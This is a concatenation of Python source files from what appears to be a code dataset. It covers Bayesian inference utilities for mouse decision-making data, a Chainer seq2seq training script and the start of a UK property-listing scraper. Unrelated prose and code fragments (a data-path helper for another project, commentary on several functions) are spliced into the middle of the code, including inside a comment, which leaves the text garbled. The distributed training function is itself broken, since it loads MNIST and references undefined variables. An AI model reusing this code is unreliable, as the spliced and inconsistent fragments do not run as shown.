ONE()\n all_stimuli, all_dates = {}, {}\n mice_names, ins, ins_id, sess_id, time_stamps = get_bwm_ins_alyx(one)\n for idx in range(len(sess_id)):\n # data = load_session(sess_id[idx])\n # stim_side, stimuli, actions, pLeft_oracle = format_data(data)\n # all_stimuli[sess_id[idx]] = stim_side\n all_dates[sess_id[idx]] = time_stamps[sess_id==sess_id[idx]]\n #pickle.dump(all_stimuli, open('data/stimuli.pkl', 'wb'))\n pickle.dump(all_dates, open('data/all_dates.pkl', 'wb'))\n\ndef trunc_exp(n, tau, lb, ub):\n return np.exp(-n/tau) * (n >= lb) * (n <= ub)\n\ndef hazard_f(x, tau, lb, ub):\n return trunc_exp(x, tau, lb, ub)/np.sum(trunc_exp(np.linspace(x,x+ub,ub+1), tau, lb, ub), axis=0)\n\ndef perform_inference(stim_side, tau=60, gamma=0.8, lb=20, ub=100):\n\n nb_trials, nb_blocklengths, nb_typeblocks = len(stim_side), ub, 3\n h = np.zeros([nb_trials, nb_blocklengths, nb_typeblocks])\n priors = np.zeros([nb_trials, nb_blocklengths, nb_typeblocks]) - np.inf \n # at the beginning of the 
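Every exporter above re-derives the data directory with the same four-line block. A sketch of hoisting it into a single helper with identical behaviour (get_data_path is an illustrative name):

from pathlib import Path

def get_data_path() -> Path:
    # if the working directory is already ml_drought we don't need ../data
    if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':
        return Path('data')
    return Path('../data')

# e.g. export_vhi() would reduce to:
#     exporter = VHIExporter(get_data_path())
#     exporter.export()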
task (0), current length is 1 (0) and block type is unbiased (1)\n h[0, 0, 1], priors[0, 0, 1] = 0, 0\n hazard = hazard_f(np.arange(1, ub + 1), tau=tau, lb=lb, ub=ub)\n l = np.concatenate((np.expand_dims(hazard, -1), np.concatenate(\n (np.diag(1 - hazard[:-1]), np.zeros(len(hazard)-1)[np.newaxis]), axis=0)), axis=-1)\n b = np.zeros([len(hazard), 3, 3])\n b[1:][:,0,0], b[1:][:,1,1], b[1:][:,2,2] = 1, 1, 1 # case when l_t > 0\n b[0][0][-1], b[0][-1][0], b[0][1][np.array([0, 2])] = 1, 1, 1./2 # case when l_t = 1\n # transition matrix l_{t-1}, b_{t-1}, l_t, b_t\n t = np.log(np.swapaxes(l[:,:,np.newaxis,np.newaxis]\n * b[np.newaxis], 1, 2)).reshape(nb_typeblocks * nb_blocklengths, -1)\n priors = priors.reshape(-1, nb_typeblocks * nb_blocklengths)\n h = h.reshape(-1, nb_typeblocks * nb_blocklengths)\n\n for i_trial in range(nb_trials):\n s = stim_side[i_trial]\n loglks = np.log(np.array([gamma*(s==-1) + (1-gamma)\n * (s==1), 1./2, gamma*(s==1) + (1-gamma)*(s==-1)]))\n\n # save priors\n if i_trial > 0:\n priors[i_trial] = logsumexp(h[i_trial - 1][:, np.newaxis] + t, axis=(0))\n h[i_trial] = priors[i_trial] + np.tile(loglks, ub)\n\n priors = priors - np.expand_dims(logsumexp(priors, axis=1), -1)\n h = h - np.expand_dims(logsumexp(h, axis=1), -1)\n priors = priors.reshape(-1, nb_blocklengths, nb_typeblocks)\n h = h.reshape(-1, nb_blocklengths, nb_typeblocks)\n marginal_blocktype = np.exp(priors).sum(axis=1)\n marginal_currentlength = np.exp(priors).sum(axis=2) \n pLeft_inferred = marginal_blocktype[:, 0] * (1 - gamma) + marginal_blocktype[:, 1] * 0.5 + marginal_blocktype[:, 2] * gamma\n\n return pLeft_inferred, marginal_blocktype, marginal_currentlength, priors, h\n\n\ndef format_data(data):\n stim_side = (np.isnan(data['contrastLeft'])==False) * 1 - (np.isnan(data['contrastRight'])==False) * 1\n stimuli = np.zeros(len(stim_side))\n stimuli[np.isnan(data['contrastLeft'])==False] = data['contrastLeft'][np.isnan(data['contrastLeft'])==False]\n stimuli[np.isnan(data['contrastRight'])==False] = -data['contrastRight'][np.isnan(data['contrastRight'])==False]\n actions = data['choice']\n pLeft_oracle = data['probabilityLeft']\n return stim_side, stimuli, actions, pLeft_oracle\n\ndef get_bwm_ins_alyx(one=None):\n import datetime\n \"\"\"\n Return insertions that match criteria :\n - project code\n - session QC not critical (TODO may need to add probe insertion QC)\n - at least 1 alignment\n - behavior pass\n :return:\n ins: dict containing the full details on insertion as per the alyx rest query\n ins_id: list of insertions eids\n sess_id: list of (unique) sessions eids\n \"\"\"\n if one is None:\n one = ONE()\n ins = one.alyx.rest('insertions', 'list',\n django='session__project__name__icontains,ibl_neuropixel_brainwide_01,'\n 'session__qc__lt,50,'\n 'json__extended_qc__alignment_count__gt,0,'\n 'session__extended_qc__behavior,1')\n ins_id = [item['id'] for item in ins]\n sess_id = [item['session_info']['id'] for item in ins]\n mice_names = np.array([item['session_info']['subject'] for item in ins])\n sess_id, i = np.unique(sess_id, return_index=True)\n time_stamps = []\n for item in ins:\n s = (item['session_info']['start_time'].split(':')[0] + ':' + item['session_info']['start_time'].split(':')[1])\n time_stamps.append(datetime.datetime.strptime(s, '%Y-%m-%dT%H:%M').timestamp())\n return mice_names[i], np.array(ins)[i], np.array(ins_id)[i], sess_id, np.array(time_stamps)[i]\n\n\ndef load_session(sess_id, one=None):\n if one is None:\n one = ONE()\n\n trialstypes = ['choice',\n 'probabilityLeft',\n 
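hazard_f() above turns the truncated-exponential prior over block lengths into a hazard rate: the probability that the current block ends now, given that it has survived this long. A quick numeric check, reusing the two functions exactly as defined above:

import numpy as np

def trunc_exp(n, tau, lb, ub):
    return np.exp(-n/tau) * (n >= lb) * (n <= ub)

def hazard_f(x, tau, lb, ub):
    return trunc_exp(x, tau, lb, ub)/np.sum(trunc_exp(np.linspace(x, x+ub, ub+1), tau, lb, ub), axis=0)

h = hazard_f(np.arange(1, 101), tau=60, lb=20, ub=100)
print(h[18], h[19], h[-1])   # 0.0 below lb=20, small just past lb, exactly 1.0 at ub=100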
'feedbackType',\n 'feedback_times',\n 'contrastLeft',\n 'contrastRight',\n 'goCue_times',\n 'stimOn_times',]\n\n tmp = one.load_object(sess_id, 'trials')\n # Break container out into a dict with labels\n trialdata = {k: tmp[k] for k in trialstypes}\n\n return trialdata\n\ndef exceedance_proba(alpha, Nsamp=1e6):\n\n # Compute exceedance probabilities for a Dirichlet distribution\n # FORMAT xp = spm_dirichlet_exceedance(alpha,Nsamp)\n # \n # Input:\n # alpha - Dirichlet parameters\n # Nsamp - number of samples used to compute xp [default = 1e6]\n # \n # Output:\n # xp - exceedance probability\n #__________________________________________________________________________\n #\n # This function computes exceedance probabilities, i.e. for any given model\n # k1, the probability that it is more likely than any other model k2. \n # More formally, for k1=1..Nk and for all k2~=k1, it returns p(x_k1>x_k2) \n # given that p(x)=dirichlet(alpha).\n # \n # Refs:\n # Stephan KE, Penny WD, Daunizeau J, Moran RJ, Friston KJ\n # Bayesian Model Selection for Group Studies. NeuroImage (in press)\n #__________________________________________________________________________\n # charles.findling\n # this is a translation from matlab to code. We tried to keep the structure\n # the closest possible to the original script\n\n Nk = len(alpha)\n xp = np.zeros(Nk)\n\n for i in range(Nsamp):\n # Sample from univariate gamma densities then normalise\n # (see Dirichlet entry in Wikipedia or Ferguson (1973) Ann. Stat. 1,\n # 209-230)\n #----------------------------------------------------------------------\n\n r = np.zeros(Nk)\n for k in range(Nk):\n r[k] = np.random.gamma(alpha[k], 1)\n\n sr = np.sum(r)\n for k in range(Nk):\n r[k] = r[k]/sr\n\n # Exceedance probabilities:\n # For any given model k1, compute the probability that it is more\n # likely than any other model k2~=k1\n # ----------------------------------------------------------------------\n xp[np.argmax(r)] += 1\n\n return xp/sum(xp)\n\n\ndef BMS_dirichlet(*args):\n # Bayesian model selection for group studies\n # FORMAT [alpha, exp_r, xp] = spm_BMS (lme, Nsamp, ecp, alpha0)\n # \n # INPUT:\n # lme - array of log model evidences \n # rows: subjects\n # columns: models (1..Nk)\n # Nsamp - number of samples used to compute exceedance probabilities\n # (default: 1e6)\n # do_plot - 1 to plot p(r|y)\n # sampling - use sampling to compute exact alpha\n # ecp - 1 to compute exceedance probability\n # alpha0 - [1 x Nk] vector of prior model counts\n # \n # OUTPUT:\n # alpha - vector of model probabilities\n # exp_r - expectation of the posterior p(r|y)\n # xp - exceedance probabilities\n # \n # REFERENCE:\n # Stephan KE, Penny WD, Daunizeau J, Moran RJ, Friston KJ (2009)\n # Bayesian Model Selection for Group Studies. NeuroImage 46:1004-1017\n #__________________________________________________________________________\n # charles.findling\n # this is a translation from matlab to code. 
We tried to keep the structure\n # the closest possible to the original script\n\n if len(args) < 1:\n return ValueError('Invalid number of arguments') \n\n max_val = np.finfo('float').max\n lme = args[0]\n Ni, Nk = lme.shape\n c = 1.\n cc = 1e-3\n log_u = np.zeros([Ni, Nk])\n u = np.zeros([Ni, Nk])\n g = np.zeros([Ni, Nk])\n beta = np.zeros(Nk)\n prev_alpha = np.zeros(Nk)\n exp_r = np.zeros(Nk)\n xp = np.zeros(Nk)\n\n if len(args) < 2:\n N_samp = int(1e6)\n else:\n N_samp = int(args[1])\n if len(args) < 3:\n ecp = 1\n else:\n ecp = args[2]\n\n # prior observations\n # --------------------------------------------------------------------\n if len(args) < 4:\n alpha0 = np.ones(Nk)\n else:\n alpha0 = args[3]\n alpha = np.array(alpha0)\n\n\n # iterative VB estimation\n # ---------------------------------------------------------------------\n\n while c > cc:\n\n # compute posterior belief g(i,k)=q(m_i=k|y_i) that model k generated\n # the data for the i-th subject\n for i in range(Ni):\n for k in range(Nk):\n # integrate out prior probabilities of models (in log space)\n log_u[i, k] = lme[i,k] + digamma(alpha[k]) - digamma(np.sum(alpha))\n\n # prevent overflow\n log_u[i, :] = log_u[i, :] - np.max(log_u[i,:])\n\n # prevent numerical problems for badly scaled posteriors\n for k in range(Nk):\n log_u[i,k] = np.sign(log_u[i,k]) * np.minimum(max_val, np.abs(log_u[i,k]))\n\n # exponentiate (to get back to non-log representation)\n u[i,:] = np.exp(log_u[i,:])\n\n # normalisation: sum across all models for i-th subject\n u_i = np.sum(u[i,:])\n g[i,:] = u[i,:]/u_i\n\n # expected number of subjects whose data we believe to have been \n # generated by model k\n for k in range(Nk):\n beta[k] = np.sum(g[:,k])\n\n # update alpha\n prev_alpha[:] = alpha\n for k in range(Nk):\n alpha[k] = alpha0[k] + beta[k]\n\n # convergence?\n c = np.sum(np.abs(alpha - prev_alpha))\n\n # Compute expectation of the posterior p(r|y)\n # --------------------------------------------------------------------------\n exp_r[:] = alpha/np.sum(alpha) \n\n # Compute exceedance probabilities p(r_i>r_j)\n # --------------------------------------------------------------------------\n\n if ecp:\n if Nk == 2:\n # comparison of 2 models\n xp[0] = betainc(alpha[1], alpha[0], .5)\n xp[1] = betainc(alpha[0], alpha[1], .5)\n else:\n # comparison of >2 models: use sampling approach\n xp = exceedance_proba(alpha, N_samp)\n\n return [alpha, exp_r, xp]\n\ndef estimate_Beta(theta, weights):\n loc = np.sum(theta * weights)\n scale2 = np.sum(weights * ((theta - loc)**2))\n a = ( (1 - loc)/scale2 - 1/loc ) * (loc**2)\n b = a * (1 / loc - 1)\n return np.maximum(a, 1), np.maximum(b, 1)\n\ndef estimate_Gamma(theta, weights): # gamma for precision of normal = 1./var\n loc = np.sum(theta * weights)\n scale2 = np.sum(weights * ((theta - loc)**2))\n a = (loc**2)/scale2\n b = loc/scale2\n return a, 1/b\n\n\nimport torch\nimport gc\ndef get_cuda_variable():\n for obj in gc.get_objects():\n try:\n if torch.is_tensor(obj) or (hasattr(obj, 'data') and torch.is_tensor(obj.data)):\n print(type(obj), obj.size())\n except:\n pass\n\nimport subprocess\ndef get_gpu_memory_map():\n result = subprocess.check_output(\n [\n 'nvidia-smi', '--query-gpu=memory.used',\n '--format=csv,nounits,noheader'\n ])\n \n return float(result)\n\ndef make_transparent(plt):\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['top'].set_visible(False)\n plt.gca().spines['bottom'].set_visible(False)\n plt.gca().spines['left'].set_visible(False)\n plt.xticks([], [])\n 
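exceedance_proba() above draws each Dirichlet sample one gamma variate at a time inside a Python loop. The same Monte-Carlo estimate can be computed with numpy's built-in Dirichlet sampler; a hedged sketch, equivalent up to sampling noise:

import numpy as np

def exceedance_proba_vec(alpha, nsamp=int(1e6), rng=None):
    rng = np.random.default_rng() if rng is None else rng
    samples = rng.dirichlet(alpha, size=nsamp)           # (nsamp, Nk)
    winners = np.argmax(samples, axis=1)                 # best model per draw
    return np.bincount(winners, minlength=len(alpha)) / nsamp

print(exceedance_proba_vec([2.0, 1.0, 1.0], nsamp=100000))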
plt.yticks([], [])\n\ndef clean_up(plt):\n plt.gca().spines['right'].set_visible(False)\n plt.gca().spines['top'].set_visible(False)\n\n","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"165005772","text":"# coding: utf-8\n\"\"\"\nChainer implementation of Sequence to Sequence\n\nSutskever, Ilya, Oriol Vinyals, and Quoc V. Le.,\n\"Sequence to sequence learning with neural networks.\",\nAdvances in neural information processing systems. 2014.\n\"\"\"\n\nimport numpy as np\nfrom chainer import Chain, Variable, cuda, functions, links, optimizer, optimizers, serializers\nimport datetime\nimport random\nimport argparse\nimport sampleSeq2Seq_data\nimport chainermn\nimport mpi4py\nimport chainer\n\nEMBED=300\nHIDDEN=150\nBATCH=40\nEPOCH=20\n\n\nclass LSTM_Encoder(Chain):\n def __init__(self, vocab_size, embed_size, hidden_size):\n \"\"\"\n Initialize the encoder\n :param vocab_size: number of distinct words used (vocabulary size)\n :param embed_size: size of the word embedding vectors\n :param hidden_size: size of the hidden layer\n \"\"\"\n super(LSTM_Encoder, self).__init__(\n xe = links.EmbedID(vocab_size, embed_size, ignore_label=-1),\n eh = links.Linear(embed_size, 4 * hidden_size),\n hh = links.Linear(hidden_size, 4 * hidden_size)\n )\n\n def __call__(self, x, c, h):\n \"\"\"\n\n :param x: one-hot word\n :param c: internal memory (cell state)\n :param h: hidden state\n :return: next internal memory, next hidden state\n \"\"\"\n e = functions.tanh(self.xe(x))\n return functions.lstm(c, self.eh(e) + self.hh(h))\n\nclass LSTM_Decoder(Chain):\n def __init__(self, vocab_size, embed_size, hidden_size):\n \"\"\"\n Initialize the decoder\n :param vocab_size: number of distinct words used (vocabulary size)\n :param embed_size: size of the word embedding vectors\n :param hidden_size: size of the hidden layer\n \"\"\"\n super(LSTM_Decoder, self).__init__(\n ye = links.EmbedID(vocab_size, embed_size, ignore_label=-1),\n eh = links.Linear(embed_size, 4 * hidden_size),\n hh = links.Linear(hidden_size, 4 * hidden_size),\n he = links.Linear(hidden_size, embed_size),\n ey = links.Linear(embed_size, vocab_size)\n )\n\n def __call__(self, y, c, h):\n \"\"\"\n\n :param y: one-hot word\n :param c: internal memory (cell state)\n :param h: hidden state\n :return: predicted word, next internal memory, next hidden state\n \"\"\"\n e = functions.tanh(self.ye(y))\n c, h = functions.lstm(c, self.eh(e) + self.hh(h))\n t = self.ey(functions.tanh(self.he(h)))\n return t, c, h\n\nclass Seq2Seq(Chain):\n def __init__(self, vocab_size, embed_size, hidden_size, batch_size, gpu):\n \"\"\"\n Initialize Seq2Seq\n :param vocab_size: vocabulary size\n :param embed_size: word vector size\n :param hidden_size: hidden vector size\n :param batch_size: minibatch size\n :param gpu: whether to use the GPU\n \"\"\"\n super(Seq2Seq, self).__init__(\n # instantiate the Encoder\n encoder = LSTM_Encoder(vocab_size, embed_size, hidden_size),\n # instantiate the Decoder\n decoder = LSTM_Decoder(vocab_size, embed_size, hidden_size)\n )\n self.vocab_size = vocab_size\n self.embed_size = embed_size\n self.hidden_size = hidden_size\n self.batch_size = batch_size\n # use cupy when computing on the GPU, numpy on the CPU\n if gpu>=0:\n self.ARR = cuda.cupy\n else:\n self.ARR = np\n\n def encode(self, words):\n \"\"\"\n Run the encoder\n :param words: list of recorded words\n :return:\n \"\"\"\n # initialize the internal memory and hidden vector\n c = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n h = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n\n # feed the words to the encoder one at a time\n for w in words:\n c, h = self.encoder(w, c, h)\n\n # keep the computed hidden vector as an instance variable to hand it to the decoder\n self.h = h\n # the internal memory is not carried over, so reinitialize it\n self.c = Variable(self.ARR.zeros((self.batch_size, 
self.hidden_size), dtype='float32'))\n\n def decode(self, w):\n \"\"\"\n Run the decoder\n :param w: word\n :return: a vector of vocabulary size\n \"\"\"\n t, self.c, self.h = self.decoder(w, self.c, self.h)\n return t\n\n def reset(self):\n \"\"\"\n Reset the hidden vector, internal memory, and gradients\n :return:\n \"\"\"\n self.h = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n self.c = Variable(self.ARR.zeros((self.batch_size, self.hidden_size), dtype='float32'))\n\n self.zerograds()\n\n\ndef forward(enc_words, dec_words, model, ARR, dict):\n \"\"\"\n Compute the forward pass\n :param enc_words: list of words in the input utterance\n :param dec_words: list of words in the response sentence\n :param model: instance of Seq2Seq\n :param ARR: cuda.cupy or numpy\n :return: total computed loss\n \"\"\"\n # record the batch size\n batch_size = len(enc_words[0])\n # reset the gradients stored inside the model\n model.reset()\n # convert the words in the utterance list to chainer's Variable type\n enc_words = [Variable(ARR.array(row, dtype='int32')) for row in enc_words]\n # run the encoder ①\n model.encode(enc_words)\n # initialize the loss\n loss = Variable(ARR.zeros((), dtype='float32'))\n # feed <eos> to the decoder ②\n t = Variable(ARR.array([dict[\"<eos>\"] for _ in range(batch_size)], dtype='int32'))\n # run the decoder\n for w in dec_words:\n # decode one word at a time ③\n y = model.decode(t)\n # convert the target word to Variable type\n t = Variable(ARR.array(w, dtype='int32'))\n # compare predicted and target words to compute the loss ④\n loss += functions.softmax_cross_entropy(y, t)\n return loss\n\ndef forward_test(enc_words, model, ARR, dict):\n ret = []\n model.reset()\n enc_words = [Variable(ARR.array(row, dtype='int32')) for row in enc_words]\n model.encode(enc_words)\n t = Variable(ARR.array([0], dtype='int32'))\n y = model.decode(t)\n label = y.data.argmax()\n ret.append(label)\n\n counter = 0\n while True:\n y = model.decode(t)\n label = y.data.argmax()\n ret.append(label)\n t = Variable(ARR.array([label], dtype='int32'))\n if label == dict[\"<eos>\"]:\n break\n return ret\n\n# functions for train\ndef make_minibatch(minibatch):\n # build enc_words\n enc_words = [row[0] for row in minibatch]\n enc_max = np.max([len(row) for row in enc_words])\n enc_words = np.array([[-1]*(enc_max - len(row)) + row for row in enc_words], dtype='int32')\n enc_words = enc_words.T\n\n # build dec_words\n dec_words = [row[1] for row in minibatch]\n dec_max = np.max([len(row) for row in dec_words])\n dec_words = np.array([row + [-1]*(dec_max - len(row)) for row in dec_words], dtype='int32')\n dec_words = dec_words.T\n return enc_words, dec_words\n\ndef load_data(infile):\n data=[]\n # read the data\n with open(infile,\"r\") as f:\n for line in f.readlines():\n wakati=[]\n for str in line.replace(\"\\n\",\"\").split(\"\\t\"):\n w=str.split(\" \") #[]\n wakati.append(w) # [[],[]]\n data.append(wakati) #[[[],[]],[[],[]],...\n return(data)\n\n\n\ndef train(datafile,dictfile,modelfile,gpu,embed,hidden,batchsize,epoch,communicator):\n\n dict=sampleSeq2Seq_data.load_dict(dictfile)\n data=load_data(datafile)\n\n # vocabulary size\n vocab_size = len(dict.keys())\n # instantiate the model\n model = Seq2Seq(vocab_size=vocab_size,\n embed_size=embed,\n hidden_size=hidden,\n batch_size=batchsize,\n gpu=gpu)\n model.reset()\n # set up the GPU\n if gpu>=0:\n ARR = cuda.cupy\n cuda.get_device_from_id(gpu).use()\n model.to_gpu(gpu)\n\n if communicator == 'naive':\n print(\"Error: 'naive' communicator does not support GPU.\\n\")\n exit(-1)\n comm = chainermn.create_communicator(communicator)\n #device = comm.intra_rank\n else:\n ARR = np\n if communicator != 'naive':\n print('Warning: using naive communicator '\n 'because only naive supports CPU-only execution')\n comm = chainermn.create_communicator('naive')\n #device = -1\n\n\n if 
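make_minibatch() above left-pads encoder inputs and right-pads decoder targets with -1 (the ignore label for both EmbedID and softmax_cross_entropy), then transposes so that each row holds one time step across the batch. A tiny worked example of the resulting layout:

import numpy as np

batch = [([1, 2, 3], [4, 5]), ([6], [7, 8, 9])]   # (enc, dec) word-id pairs
enc_max = max(len(e) for e, _ in batch)
dec_max = max(len(d) for _, d in batch)
enc = np.array([[-1]*(enc_max - len(e)) + e for e, _ in batch], dtype='int32').T
dec = np.array([d + [-1]*(dec_max - len(d)) for _, d in batch], dtype='int32').T
print(enc)   # [[ 1 -1] [ 2 -1] [ 3  6]] -- columns are sentences, rows are time steps
print(dec)   # [[ 4  7] [ 5  8] [-1  9]]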
comm.mpi_comm.rank == 0:\n print('==========================================')\n print('Num process (COMM_WORLD): {}'.format(mpi4py.MPI.COMM_WORLD.Get_size()))\n if gpu>=0:\n print('Using GPUs')\n print('Using {} communicator'.format(communicator))\n print('Num Minibatch-size: {}'.format(batchsize))\n print('Num epoch: {}'.format(epoch))\n print('==========================================')\n\n\n random.seed(123)\n\n # Create a multi node optimizer from a standard Chainer optimizer.\n optimizer = chainermn.create_multi_node_optimizer(\n chainer.optimizers.Adam(), comm)\n optimizer.setup(model)\n\n # Split and distribute the dataset. Only worker 0 loads the whole dataset.\n # Datasets of worker 0 are evenly split and distributed to all workers.\n if comm.rank == 0:\n train = chainer.datasets.get_mnist()\n else:\n train = None, None\n train = chainermn.scatter_dataset(train, comm, shuffle=True)\n\n train_iter = chainer.iterators.SerialIterator(train, batchsize)\n\n updater = chainer.training.StandardUpdater(train_iter, optimizer, device=gpu)\n trainer = chainer.training.Trainer(updater, (epoch, 'epoch'), out=args.out)\n\n # Create a multi node evaluator from a standard Chainer evaluator.\n evaluator = chainermn.create_multi_node_evaluator(evaluator, comm)\n trainer.extend(evaluator)\n\n # Some display and output extensions are necessary only for one worker.\n # (Otherwise, there would just be repeated outputs.)\n if comm.rank == 0:\n trainer.extend(chainer.training.extensions.dump_graph('main/loss'))\n trainer.extend(chainer.training.extensions.LogReport())\n trainer.extend(chainer.training.extensions.PrintReport(\n ['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy', 'elapsed_time']))\n trainer.extend(chainer.training.extensions.ProgressBar())\n\n trainer.run()\n serializers.save_hdf5(modelfile, model)\n\n\n\n\n\n\n\n \"\"\"\n # 学習開始\n for epoch in range(epoch):\n # ファイルのパスの取得\n # エポックごとにoptimizerの初期化\n opt = optimizers.Adam()\n opt.setup(model)\n opt.add_hook(optimizer.GradientClipping(5))\n\n random.shuffle(data)\n for num in range(len(data)//batchsize):\n #print(str(num))\n minibatch = data[num*batchsize: (num+1)*batchsize]\n # 読み込み用のデータ作成\n enc_words, dec_words = make_minibatch(minibatch)\n # modelのリセット\n model.reset()\n # 順伝播\n total_loss = forward(enc_words=enc_words,\n dec_words=dec_words,\n model=model,\n ARR=ARR,\n dict=dict)\n # 学習\n total_loss.backward()\n opt.update()\n #opt.zero_grads()\n # print (datetime.datetime.now())\n print ('Epoch %s 終了' % (epoch+1))\n\n serializers.save_hdf5(modelfile+\".\"+str(epoch), model)\n serializers.save_hdf5(modelfile, model)\n \"\"\"\n\ndef test(datafile,dictfile,modelfile,gpu):\n\n dict=sampleSeq2Seq_data.load_dict(dictfile)\n\n\n # モデルのインスタンス化\n model = Seq2Seq(vocab_size=len(dict.keys()),\n embed_size=EMBED,\n hidden_size=HIDDEN,\n batch_size=1,\n gpu=gpu)\n serializers.load_hdf5(modelfile,model)\n\n data=[] # [[\"a\",\"b\",..],[\"c\",\"d\",..],..]\n with open(datafile,\"r\") as f:\n for line in f.readlines():\n items=sampleSeq2Seq_data.wakati_list(line,dict,True,False)\n data.append(items)\n\n\n if gpu>=0:\n ARR = cuda.cupy\n cuda.get_device_from_id(gpu).use()\n model.to_gpu(gpu)\n else:\n ARR = np\n\n # change key and val,\n # http://www.lifewithpython.com/2014/03/python-invert-keys-values-in-dict.html\n dict_inv={v:k for k,v in dict.items()}\n for dt in data:\n enc_word=np.array([dt],dtype=\"int32\").T\n predict=forward_test(enc_words=enc_word,model=model,ARR=ARR,dict=dict)\n dt.reverse()\n 
inword=to_word(dt,dict_inv)\n        outword=to_word(predict,dict_inv)\n        print(\"input:\"+str(inword)+\",output:\"+str(outword))\n\ndef to_word(id_list,dict):\n    res=[]\n    for id in id_list:\n        res.append(dict[id])\n    return (res)\n\ndef main():\n    p = argparse.ArgumentParser(description='seq2seq')\n\n\n    #p.add_argument('--mode', default=\"test\",help='train or test')\n    #p.add_argument('--data', default=\"/Volumes/DATA/data/chat/txt/test.txt\",help='in the case of input this file has two sentences a column, in the case of output this file has one sentence a column ')\n    p.add_argument('--mode', default=\"train\",choices=[\"train\",\"test\"], help='train or test')\n    p.add_argument('--data', default=\"/Volumes/DATA/data/chat/txt/init.txt\",help='in the case of input this file has two sentences per column, in the case of output this file has one sentence per column ')\n    p.add_argument('--dict', default=\"/Volumes/DATA/data/chat/txt/init.dict\",help='word dictionary file, word and word id ')\n    p.add_argument('--model',default=\"/Volumes/DATA/data/chat/txt/init.model\",help=\"in the case of train mode this file is output,in the case of test mode this file is input\")\n    p.add_argument('-g','--gpu',default=-1, type=int)\n    p.add_argument('--embed',default=EMBED, type=int,help=\"only train mode\")\n    p.add_argument('--hidden',default=HIDDEN, type=int, help=\"only train mode\")\n    p.add_argument('--batch',default=BATCH, type=int, help=\"only train mode\")\n    p.add_argument('--epoch',default=EPOCH, type=int, help=\"only train mode\")\n    p.add_argument('--communicator', type=str, default='hierarchical', help='Type of communicator')\n    p.add_argument('--outdir', type=str, default='/Volumes/DATA/data/chat/outfiles/', help='Output directory')\n    args = p.parse_args()\n\n    print ('Started: ', datetime.datetime.now())\n    try:\n        if args.mode == \"train\":\n            train(args.data,args.dict,args.model,args.gpu,args.embed,args.hidden,args.batch,args.epoch,args.communicator)\n        else:\n            test(args.data,args.dict,args.model,args.gpu)\n    except Exception:\n        import traceback\n        print( traceback.format_exc())\n\n    print ('Finished: ', datetime.datetime.now())\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"sampleSeq2SeqMN.py","file_name":"sampleSeq2SeqMN.py","file_ext":"py","file_size_in_byte":15458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"574164228","text":"#https://www.zoopla.co.uk/for-sale/houses/edinburgh/?q=Edinburgh&radius=40&results_sort=newest_listings&search_source=refine\n#https://www.zoopla.co.uk/for-sale/houses/edinburgh/?identifier=edinburgh&property_type=houses&q=Edinburgh&search_source=refine&radius=40&pn=2\n\nimport requests \nfrom bs4 import BeautifulSoup, SoupStrainer\nimport pandas\nimport re \nimport numpy as np\nimport os\nfrom copy import deepcopy\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nimport storage\n\nprint(\"\\nProperty data scraper. 
UK cities only.\\n\")\nsearch_time = datetime.now().strftime(\"%Y-%m-%d_%H%M\")\n\ncity = input(\"Enter city name: \")\nradius = input(\"Enter geographic search radius (maximum 40): \")\n\naccepted_radii = [1, 3, 5, 10, 15, 20, 30, 40]\n\nif int(radius) not in accepted_radii:\n print(\"Radius must be 40 or less\")\n print(\"Enter one of the following: 1, 3, 5, 10, 15, 20, 30, 40\")\n radius = input(\"Re-enter search radius: \") \n\nheaders = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'}\n\nr = requests.get(f\"https://www.zoopla.co.uk/for-sale/houses/{city}/?identifier={city}&property_type=houses&q={city}&search_source=refine&radius={radius}&pn=1\", headers=headers)\nc = r.content\nsoup = BeautifulSoup(c, \"html.parser\")\nall = soup.find_all(\"div\", {\"class\":\"listing-results-wrapper\"})\n\n\nfor page in soup.find_all(\"div\", {\"class\":\"paginate bg-muted\"}):\n numpages = page.find_all(\"a\")[-2].text\n\nprint(str(numpages) + \" pages of results...\\n\")\n\n\nif len(all) < 1:\n print(\"\\nNothing found. Ensure city name entered correctly.\")\n\ni = 0\nproplist = []\nbase_url=f\"https://www.zoopla.co.uk/for-sale/houses/{city}/?identifier={city}&page_size=100&property_type=houses&q={city}&search_source=refine&radius={radius}&pn=\"\nchars=\"qwertyuiopasdfghjklzxcvbnm,\"\n\nif int(numpages) > 50:\n cont = input(\"Over 50 pages of results. Are you sure you wish to continue? y/n: \")\n if \"y\" in cont:\n pass\n else:\n print(\"Program terminated\")\n exit()\n\nprint(\"\\nScanning \" + str(numpages) + \" pages...\\n\")\n\nfor page in tqdm(range(1, int(numpages)+1, 1)):\n r = requests.get(base_url + str(page))\n c = r.content\n soup=BeautifulSoup(c, \"lxml\")\n all = soup.find_all(\"div\", {\"class\":\"listing-results-wrapper\"})\n\n for item in all:\n\n property = {}\n i += 1\n\n property[\"Date_Listed\"]=item.find(\"p\", {\"class\":\"top-half listing-results-marketed\"}).find(\"small\").text.replace(\" \", \"\").replace(\"\\n\", \"\").replace(\"Listedon\", \"\").replace(\"by\", \"\")\n try:\n property[\"Price\"] = item.find(\"a\", {\"class\":\"listing-results-price text-price\"}).text.replace(\"\\n\", \"\").replace(\"Offersinregionof\", \"\").replace(\" \", \"\").replace(\"Offersover\", \"\")\n property[\"Price\"] = ''.join(filter(str.isdigit, property[\"Price\"]))\n if property[\"Price\"] == \"\":\n property[\"Price\"] = \"0\"\n except:\n property[\"Price\"] = \"0\"\n\n property[\"Address\"]=item.find_all(\"a\", {\"class\":\"listing-results-address\"})[0].text\n\n try:\n property[\"Beds\"]=item.find(\"span\", {\"class\":\"num-icon num-beds\"}).text\n except:\n property[\"Beds\"]=\"0\"\n try:\n property[\"Bathrooms\"]=item.find(\"span\", {\"class\":\"num-icon num-baths\"}).text\n except:\n property[\"Bathrooms\"]=\"0\"\n try:\n 